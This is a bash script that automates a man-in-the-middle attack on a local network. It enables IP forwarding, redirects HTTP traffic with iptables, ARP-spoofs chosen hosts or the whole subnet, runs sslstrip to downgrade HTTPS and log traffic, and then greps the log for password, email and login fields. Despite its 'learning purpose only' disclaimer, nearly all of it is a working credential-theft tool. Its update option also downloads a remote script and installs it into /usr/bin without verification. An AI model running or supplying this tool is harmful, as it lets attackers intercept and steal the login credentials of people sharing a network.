#!/bin/bash # Little bash script to launch man it the middle attack and sslstrip. # version 0.6 by comaX PROGNAME=$(basename $0) VERSION="0.6.2" #Let's define some arguments that can be passed to the script : args= while [ $# -ge 1 ] #check parameters do case $1 in -h | --help) #define help message clear echo -e "You are running $0, version $VERSION. usage : $0 [-h | --help] | [-u | --upadte] -h or --help : displays this help message, disclaimer and exit. -u or --update updates and installs this script \033[31m DISCLAIMER :\033[m This program is intended for learning purpose only. I do not condone hacking and wouldn't be held responsible for you actions. Only you would face legal consequences if you used this script for illegal activities. \033[31m What I think should be learnt from this script :\033[m This script should teach you how easy it is to steal sensitive online credential and how to protect you from it, provided you understand what this program does. The best way to understand what it does is to look at its source. This will also teach you very basic shell script programming. \033[31m Changelog :\033[m added in v0.6 -Support for multiple targets added in v0.5 : -Parameters for this great help message and update, more comments. -Minor improvments added in v0.4 : -User friendly case insensitive answers (Y/y) -Option to map network, retrieving live hosts and their dns names -Minor improvments \033[31m Credits :\033[m Credits goes to all people on backtrack forums for their help and support, and google for being my best friend with scripting. Please criticize this program or submit ideas on the official thread at http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com" exit ;; -u | --update) #update program echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)" read -e proceed if [[ $proceed = "y" || $proceed = "Y" ]] ; then wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin rm /tmp/mitm_update.sh #delete temp file echo -e "\033[32m Script updated ! Restarting to updated version...\033[m" sleep 3 chmod +x /usr/bin/mitm #make newly installed script executable /usr/bin/mitm #launch new script else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2 fi ;; *) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;; esac shift done clear echo -e "=========================================================================== =\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m = = Feel free to contribute, and distribute this script as you please. = = Official thread : http://tiny.cc/mitmautomate = = Check out the help (-h) to see new features and informations = = You are running version $VERSION. = ===========================================================================" echo echo # Starting fresh : reset ip forward and iptables echo -e "\033[31m [+] Cleaning iptables \033[m" echo "[-] Cleaned." echo "0" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain # Defining exit function and other ending features cleanup() { echo echo "[+] Killing processes and resetting iptable." kill ${sslstripid} killall arpspoof echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding iptables --flush # there are probably too many resets here, iptables --table nat --flush # but at least we're sure everything's clean iptables --delete-chain iptables --table nat --delete-chain echo "[+] Clean up successful..." echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results echo -e "\033[37m (Will be blank if no passwords were found) \033[m" egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found echo echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)" echo "If you want to keep it, it will be stored in /root/$filename.txt" read -e keep if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or" mv /tmp/$filename.txt /root/$filename.txt #moving file if [ -f "/root/$filename.txt" ]; then #check if it exists echo "Log file copied !" #it does else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not fi else rm /tmp/$filename.txt #removing temp file echo "All logs deleted" fi if [ -f "/usr/bin/mitm" ]; then #check if script is already installed echo echo exit 1 #if yes, exit. else echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask. read -e install if [[ $install = "Y" || $install="y" ]] ; then cp ./mitm.sh /usr/bin/mitm #copy and rename script echo -e "\033[32m Script installed !\033[m" else echo "Script not installed." fi fi exit } ###############################End of functions############################# # IP forwarding echo echo -e "\033[31m [+] Activating ip forwarding... \033[m" echo "1" > /proc/sys/net/ipv4/ip_forward echo "[-] Activated." #Iptables echo echo -e "\033[31m [+] Configuring iptables... \033[m" echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)" echo read -e outport echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)" echo read -e inport echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m" iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport echo "[-] Traffic rerouted" #Arpspoofing echo echo -e "\033[31m [+] Activating arpspoofing... \033[m" echo ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need. echo echo "Enter gateway ip adress (as shown above) :" read -e gateway echo echo "What interface would you like to use ? (it should match gateway ip as shown above)" read -e iface echo echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)" read -e choicearp echo if [[ $choicearp = "N" || $choicearp = "n" ]] ; then echo echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]" read -e hosts echo -e "\033[31m " if [[ $hosts = "Y" || $hosts = "y" ]] ; then fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts) rm /tmp/hosts.txt # remove temporary file echo -e "\033[m " # switch color back to white else echo -e "\033[m " fi echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m " arpspoofi() { xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2 if [[ "$2" > "0" ]] ; then xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2 else echo fi if [[ "$3" > "0" ]] ; then xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2 else echo fi if [[ "$4" > "0" ]] ; then xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2 else echo fi if [[ "$5" > "0" ]] ; then xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2 else echo fi if [[ "$6" > "0" ]] ; then xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2 else echo fi t1=$1 t2=$2 t3=$3 t4=$4 t5=$5 t6=$6 } echo "Enter ip adresses" read -e parameters arpspoofi $parameters echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m" echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m" elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$! sleep 2 echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m" echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m" else echo "Your choice is invalid. Quitting." cleanup fi #Sslstrip echo echo -e "\033[31m [+] Activating sslstrip... \033[m" echo "Choose filename to output :" read -e filename sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines echo echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m" echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ? echo echo -e "\033[37m Attack should be running smooth, enjoy.\033[m" echo echo -e "\033[33m To stop the attack, input 'quit' below :\033[m" echo read quitting if [ $quitting = "quit" ] ; then cleanup else echo "Bad choice. Enter quit to stop attack" read -e quitting if [ $quitting = "quit" ] ; then cleanup else echo "Bad choice. Enter quit to stop attack" read -e quitting if [ $quitting = "quit" ] ; then cleanup else echo "Bad choice. Enter quit to stop attack" read -e quitting if [ $quitting = "quit" ] ; then cleanup else echo "Bad choice. Enter quit to stop attack" echo echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here cleanup fi fi fi fi